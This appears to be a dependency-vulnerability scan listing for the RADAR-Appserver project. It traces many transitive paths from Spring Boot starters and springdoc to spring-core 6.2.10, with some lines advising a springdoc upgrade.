Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
